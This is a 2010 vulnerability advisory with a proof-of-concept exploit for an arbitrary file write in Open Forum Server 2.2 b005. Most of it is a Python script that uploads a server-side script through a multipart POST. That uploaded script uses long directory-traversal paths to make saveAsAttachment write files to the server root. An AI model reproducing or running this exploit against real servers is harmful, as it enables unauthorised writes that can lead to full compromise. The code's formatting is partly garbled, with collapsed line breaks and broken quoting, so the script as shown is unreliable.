
openforumserver-write.txt

Posted on 25 May 2010

#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/ /\_ /\_ /\_ /\_ /\_______) ) ___ ( /_/\__/ ) ___ ( /_/ /\_ /\_____/_/\__/ #
# ) ) )( ( ( /_/( ( ( ( ( ( (___ __// /\_/ ) ) ) ) )/ /\_/ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\ \_ /\_\ \_ \_ / / / / /_/ (_ /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/ #
# / / // / // / /__ / / /__ ( ( ( )_/ / / \_/ )_/ / / / / // /__/_ #
# )_) / (_(( (_(( (_____(( (_____( /_/ / )_) ) /_/ / )_) / (_(( (_____)_) ) #
# \_/ /_/ /_/ /_____/ /_____/ /_/_/ )_____( \_/ )_____( \_/ /_/ /_____/\_/ \_/ #
# #
#============================================================================================================#
# #
# Vulnerability............Arbitrary File Write #
# Software.................Open Forum Server 2.2 b005 #
# Download.................http://code.google.com/p/open-forum #
# Date.....................5/23/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be #
# exploited to write to the local file system of the server. #
# #
# #
# ##Exploit## #
# #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.
# # # # # # ##Proof of Concept## # # # import sys, socket host = 'localhost' port = 80 def send_request(request): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(32) # sometimes it takes a while s.connect((host, port)) s.send(request) response = s.recv(8192) + s.recv(8192) # a hack within a hack return response def write_file(): try: content = '----x-- '\n'Content-Disposition: form-data; name="file"; filename="get.sjs" '\n'Content-Type: application/octet-stream '\n'fileName = "' + '..\\' * 256 + 'x.txt"; '\n'data = "hello, world"; '\n'user = transaction.getUser(); '\n'wiki.saveAsAttachment("x",fileName,data,user); '\n'transaction.sendPage("File Written"); '\n'----x---- ' response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1 ' 'Host: ' + host + ' ' 'Content-Type: multipart/form-data; boundary=--x-- ' 'Content-Length: ' + str(len(content)) + ' ' + content) if 'HTTP/1.1 302 Redirect' not in response: print 'Error writing get.sjs' return else: print 'get.sjs created' response = send_request('GET OpenForum HTTP/1.1 ' 'Host: ' + host + ' ') if 'File Written' not in response: print 'Error writing to root' return else: print 'x.txt created in root' except Exception: print sys.exc_info() write_file()

 
